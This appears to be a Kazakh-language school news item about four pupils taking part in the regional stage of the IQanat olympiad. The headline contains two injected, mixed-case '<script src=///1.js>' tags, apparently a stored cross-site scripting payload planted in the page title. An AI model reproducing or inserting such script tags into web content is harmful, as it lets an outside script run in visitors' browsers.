Ақмола облысында IQanat олимпиадасының екінші кезеңі өтті<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.04.2022
☑️Ақмола облысында IQanat олимпиадасының екінші кезеңі өтті
01.04.2022 ж құрылыс-технологиялық колледжінің алаңында
IQanat олимпиадасының облыстық кезеңінің екінші кезеңі өтті.
Олимпиадаға біздің мектебіміздің 8-сынып оқушылары қатысты.Мектемімізден
ІІ кезеңге қатысқан оқушылар:
-Өнержан Ақерке
-Бахитбек Назым
-Жанарбек Мұхаммед
-Мейремхан Наурыз.
🕑 Екі сағаттың ішінде балалар бір блок – математика, физика, химия, биология және екінші блок – Қазақстан тарихы, дүние жүзі тарихы және география бойынша тапсырмаларды орындауы керек болды.
🖊️Сондай-ақ, олимпиада аясында мектеп оқушылары тұлғалық өсуді дамытуға, оқу мотивациясын және кәсіби бағдарын арттыруға бағытталған оқу семинарлары мен тренингтерге қатысты.
📌❗«Бұл олимпиаданың ерекшелігі сол, олимпиада финалистері EduCon білім беру орталығының қашықтан платформасы арқылы 2 жыл бойы ҰБТ-ға дайындалу мүмкіндігіне ие болады, сонымен қатар қордың басқа да көптеген іс-шараларына қатысады. Ал ең дарындылар Бурабай ауданы, Щучье көлінің жағасында орналасқан IQanat мектебінде оқу грантының иегері бола алады», - деп атап өтті ұйымдастырушылар.
 
Просмотров: 341


Пікір қосу



Деректерді қолтаңбаға қосу